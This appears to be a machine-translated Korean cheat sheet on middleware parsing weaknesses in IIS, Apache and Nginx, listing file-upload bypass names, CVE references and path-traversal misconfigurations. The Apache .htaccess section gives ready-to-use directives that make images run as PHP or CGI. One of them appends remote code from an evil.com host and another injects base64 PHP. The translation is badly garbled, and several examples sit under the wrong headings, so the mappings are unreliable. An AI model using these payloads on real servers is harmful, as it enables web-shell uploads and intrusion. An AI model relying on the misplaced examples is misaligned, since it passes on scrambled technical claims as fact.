4.15. 중간 부품

내용 인덱스:

4.15. 미들웨어

4.15.1. IIS

4.15.1.1. IIS 6.0

4.15.1.2. IIS 7.0-7.5 / Nginx <= 0.8.37

4.15.1.3. PUT 구멍

4.15.1.4. Windows 특성

4.15.1.5. 파일 이름 추측

4.15.1.6. 참조 링크

4.15.2. Apache

4.15.2.1. 접미사 해석

4.15.2.2. .htaccess

4.15.2.3. 디 렉 터 리 옮 겨 다 니 기

4.15.2.4. CVE-2017-15715

4.15.2.5. lighttpd

4.15.2.6. 참조 링크

4.15.3. Nginx

4.15.3.1. Fast - CGI 닫 기

4.15.3.2. Fast - CGI 오픈

4.15.3.3. CVE-2013-4547

4.15.3.4. 설정 오류

4.15.3.4.1. 디 렉 터 리 타임 슬립

4.15.3.4.2. 디 렉 터 리 옮 겨 다 니 기

4.15.3.5. 참조 링크

4.15. 중간 부품
4.15.1. IIS
4.15.1.1. IIS 6.0

접미사 해석 /xx.asp;.jpg

서버 는 기본적으로 ; 번호 와 그 뒤의 내용 을 분석 하지 않 고 차단 하 는 것 과 같 습 니 다.

디 렉 터 리 분석 /xx.asp/xx.jpg ( xx. asp 디 렉 터 리 에서 임 의 해석)

기본 해석 xx.asa xx.cer xx.cdx

PROFFIND 창고 넘 침 구멍

RCE CVE-2017-7269

4.15.1.2. IIS 7.0-7.5 / Nginx <= 0.8.37
Fast - CGI 가 열 린 상태 에서 파일 경로 뒤에 /xx.php, 즉 xx.jpg/xx.php 을 더 하면 php 파일 로 해 석 됩 니 다.
4.15.1.3. PUT 구멍

WebDAV

오픈

내빈 사용 자 를 보유 하고 내빈 사용 자 는 업로드 권한 을 가진다

임의의 파일 업로드 가능

4.15.1.4. Windows 기능
윈도 우 는 빈 칸 과 점, 그리고 일부 특수 문 자 를 끝으로 사용 할 수 없습니다. 이러한 파일 을 만 들 면 자동 으로 이름 이 바 뀌 기 때문에 xx.php[ ], xx.php., xx.php/ 스 크 립 트 파일 을 업로드 할 수 있 습 니 다.
4.15.1.5. 파일 이름 추측
NTFS 8.3 파일 형식 을 지원 할 때 짧 은 파일 이름 으로 디 렉 터 리 파일 을 맞 출 수 있 습 니 다.짧 은 파일 이름 특징 은 다음 과 같 습 니 다.

파일 이름 은 원본 파일 이름 앞의 6 자리 문자 에 xx.php::$DATA 숫자 부분 이 증가 하고 접두사 가 같은 파일 이 존재 하면 뒤의 숫자 가 증가 합 니 다.

접미사 명 은 3 자 리 를 넘 지 않 고 초과 부분 은 잘 립 니 다

모든 소문 자 는 대문자 로 변환 된다

파일 이름 접미사 길이 가 4 보다 크 거나 총 길이 가 9 보다 크 면 짧 은 파일 이름 이 생 성 되 며, 빈 칸 이나 다른 부분의 특수 문 자 를 포함 하면 길이 조건 을 무시 합 니 다

IIS 8.0 이전 버 전 은 짧 은 파일 이름 추측 을 지원 하 는 HTTP 방법 은 주로 DEBUG, OPTIONS, GET, POST, HEAD, TRACE 6 가 지 를 포함 하고 ASP. NET 을 설치 해 야 합 니 다.IIS 8.0 이후 버 전 은 OPTIONS 와 TRACE 방법 으로 만 성공 을 추측 할 수 있 지만 ASP. NET 의 제한 은 없다.
이런 방법의 한계점 은:
"

폴 더 이름 앞의 6 자리 문자 대역 점". "스 캔 프로그램 은 폴 더 가 아 닌 파일 이 라 고 생각 하고 오류 가 발생 합 니 다

.

중국어 파일 이름 은 지원 되 지 않 습 니 다

이 방법 은 명령 ~1 을 통 해 NTFS 8.3 파일 형식 을 닫 는 지원 을 통 해 복구 할 수 있다.
4.15.1.6. 참조 링크

Windows 특성 을 이용 하여 효율 적 인 추측 디 렉 터 리

Uploading web.config for Fun and Profit 2

4.15.2. Apache
4.15.2.1. 접미사 해석fsutil behavior set disable8dot3 1 (x1, x2, x3 는 mime. types 파일 에 정의 되 지 않 은 파일 형식).Apache 는 오른쪽 에서 왼쪽으로 접 두 사 를 판단 하고, x3 가 인식 할 수 없 는 접두사 라면 식별 할 수 있 는 접 두 사 를 찾 을 때 까지 x2 를 판단 한 다음 식별 가능 한 접 두 사 를 분석한다.
4.15.2.2. .htaccess
AllowOverride 가 활성화 되 었 을 때 해석 규칙 을 사용 하 는. htaccess 를 업로드 합 니 다.
AddType application/x-httpd-php .jpg
php_value auto_append_file .htaccess #
Options ExecCGI AddHandler cgi-script .jpg
Options +ExecCGI AddHandler fcgid-script .gif FcgidWrapper “/bin/bash” .gif
php_flag allow_url_include 1 php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw== #php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B #php_value auto_append_file https://evil.com/evil-code.txt
4.15.2.3. 디 렉 터 리 옮 겨 다 니 기
설정 test.php.x1.x2.x3 시 아파 치 에 디 렉 터 리 에 빈틈 이 있 습 니 다.
4.15.2.4. CVE-2017-15715 Options +Indexes 블랙리스트 올 리 기 를 피해.
4.15.2.5. lighttpd %0A
4.15.2.6. 참조 링크

Apache 업로드 우회

4.15.3. Nginx
4.15.3.1. Fast - CGI 닫 기
Fast - CGI 가 닫 힌 상태 에서 도 Nginx 에 분석 구멍 이 있 습 니 다. 파일 경로 (xx. jpg) 뒤에 xx.jpg/xx.php, 즉 %00.php 을 더 하면 php 파일 로 해 석 됩 니 다.
4.15.3.2. Fast - CGI 오픈
Fast - CGI 가 열 린 상태 에서 파일 경 로 를 추가 xx.jpg%00.php 하면 /xx.php php 파일 로 해 석 됩 니 다.
4.15.3.3. CVE-2013-4547 xx.jpg/xx.php
4.15.3.4. 설정 오류
4.15.3.4.1. 디 렉 터 리 타임 슬립
설정 에 유사 한 a.jpg\x20\x00.php 설정 이 있 을 때 location /foo { alias /bar/; } 는 /foo../ 로 해석 되 어 디 렉 터 리 타임 슬립 이 발생 합 니 다.
4.15.3.4.2. 디 렉 터 리 옮 겨 다 니 기
설정 중 /bar/../ 이 열 렸 을 때 Nginx 에 디 렉 터 리 에 구멍 이 있 습 니 다.
4.15.3.5 참조 링크

CVE - 2013 - 4547 Nginx 해석 구멍 깊이 이용 및 분석